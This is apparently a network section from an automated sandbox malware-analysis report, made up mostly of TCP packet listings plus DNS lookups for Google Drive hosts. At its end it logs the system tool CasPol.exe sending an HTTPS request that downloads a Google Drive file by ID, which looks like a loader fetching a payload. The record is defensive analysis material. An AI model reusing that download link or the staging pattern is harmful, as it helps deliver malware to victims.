Dec 14, 2021 13:42:35.905246973 CET	443	49803	142.250.181.238	192.168.11.20
Dec 14, 2021 13:42:36.025352001 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.025448084 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.025712013 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.026026011 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.026072025 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.079577923 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.079775095 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.081629038 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.081883907 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.081904888 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.090877056 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.090897083 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.091212988 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.091348886 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.091677904 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.135879993 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.330442905 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.330631018 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.330672979 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.330781937 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.330967903 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.330996990 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331208944 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.331346989 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.331429005 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331458092 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331468105 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331487894 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.331631899 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331746101 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.331957102 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.332343102 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.335028887 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.335326910 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.338335991 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.338599920 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.338660002 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.338917971 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.341437101 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.341651917 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.341695070 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.341867924 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.341896057 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.341922045 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.342075109 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.342221022 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.342263937 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.342294931 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.342417002 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.342519045 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.342726946 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.342876911 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.342912912 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.343166113 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.343225956 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.343477011 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.343570948 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.343770027 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.343843937 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.343879938 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.344022036 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.344065905 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.344356060 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.344547987 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.344583035 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.344604015 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.344882011 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.345283031 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.345488071 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.345523119 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.345827103 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.345886946 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.346096992 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.346298933 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.346506119 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.346533060 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.346559048 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.346787930 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.347306013 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.347511053 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.347522974 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.347560883 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.347743988 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.349196911 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.349359035 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.349401951 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.349682093 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.349734068 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.349931955 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.349966049 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.350121021 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.350162029 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.350188971 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.350434065 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.352415085 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.352591991 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.352606058 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.352638006 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.352792978 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.352832079 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.352855921 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.352982044 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.353122950 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.353173018 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.353183031 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.353429079 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.353632927 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.353817940 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.353832960 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.353856087 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.354118109 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.354371071 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.354561090 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.354595900 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.354763985 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.354811907 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.355104923 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.355119944 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.355146885 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.355310917 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.355523109 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.355572939 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.355585098 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.355802059 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.356046915 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356221914 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356235027 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.356262922 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356462955 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.356494904 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356707096 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.356734991 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356888056 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356981039 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.356998920 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.357019901 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.357176065 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.357188940 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.357712030 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.357898951 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.357913017 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.357945919 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.358088970 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.358123064 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.358304977 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.358655930 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.358830929 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.358863115 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.358892918 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359045029 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359246016 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.359285116 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359291077 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.359463930 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.359496117 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359628916 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359726906 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359899044 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.359931946 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.359940052 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.360033989 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.360199928 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.360408068 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.360572100 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.360632896 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.360646963 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.360690117 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.360893011 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.360913038 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.361218929 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.361376047 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.361458063 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.361499071 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.361536026 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.361555099 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.361668110 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.361916065 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.362246990 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.362402916 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.362452984 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.362474918 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.362636089 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.362651110 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.362701893 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.362925053 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.362951040 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.363370895 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.363508940 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.363590002 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.363676071 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.363723993 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.363769054 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.363780975 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.363897085 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.363923073 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364044905 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364088058 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364109039 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364114046 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364289999 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364315987 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364473104 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364504099 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364514112 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364556074 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364583015 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364747047 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364794016 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.364809990 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.364985943 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.365273952 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.365442991 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.365458965 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.365477085 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.365619898 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.365638971 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.365659952 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.365930080 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.365945101 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366111994 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.366216898 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366394043 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366432905 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.366450071 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366548061 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366609097 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.366617918 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.366627932 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366650105 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.366785049 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.366997004 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367007971 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367038012 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367192984 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367321968 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367330074 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367357969 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367366076 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367503881 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367573023 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367618084 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367645025 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367650986 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367721081 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.367851973 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.367871046 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368042946 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368058920 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368063927 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368261099 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368289948 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368432045 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368458986 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368587017 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368643999 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368662119 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368740082 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.368741035 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.368843079 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369026899 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369033098 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369035006 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369055986 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369074106 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369254112 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369363070 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369384050 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369411945 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369514942 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369604111 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369617939 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.369667053 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.369858980 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370038033 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370065928 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370234013 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370249987 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370340109 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370412111 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370424986 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370445013 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370598078 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370616913 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370621920 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370646954 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370803118 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.370816946 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.370883942 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371006966 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371023893 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371030092 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371180058 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371191978 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371346951 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371350050 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371381998 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371393919 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371408939 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371489048 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371627092 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371649027 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371669054 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371788979 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371798038 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371974945 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.371977091 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.371995926 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.372287035 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.372328997 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.372370005 CET	443	49804	142.250.181.225	192.168.11.20
Dec 14, 2021 13:42:36.372376919 CET	49804	443	192.168.11.20	142.250.181.225
Dec 14, 2021 13:42:36.372591019 CET	49804	443	192.168.11.20	142.250.181.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2021 13:42:35.205521107 CET	61072	53	192.168.11.20	1.1.1.1
Dec 14, 2021 13:42:35.215145111 CET	53	61072	1.1.1.1	192.168.11.20
Dec 14, 2021 13:42:35.964066029 CET	63435	53	192.168.11.20	1.1.1.1
Dec 14, 2021 13:42:36.023989916 CET	53	63435	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 14, 2021 13:42:35.205521107 CET	192.168.11.20	1.1.1.1	0x6702	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 14, 2021 13:42:35.964066029 CET	192.168.11.20	1.1.1.1	0x3705	Standard query (0)	doc-0g-7s-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 14, 2021 13:42:35.215145111 CET	1.1.1.1	192.168.11.20	0x6702	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)
Dec 14, 2021 13:42:36.023989916 CET	1.1.1.1	192.168.11.20	0x3705	No error (0)	doc-0g-7s-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 14, 2021 13:42:36.023989916 CET	1.1.1.1	192.168.11.20	0x3705	No error (0)	googlehosted.l.googleusercontent.com		142.250.181.225	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0g-7s-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49803	142.250.181.238	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-14 12:42:35 UTC	0	OUT	GET /uc?export=download&id=1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
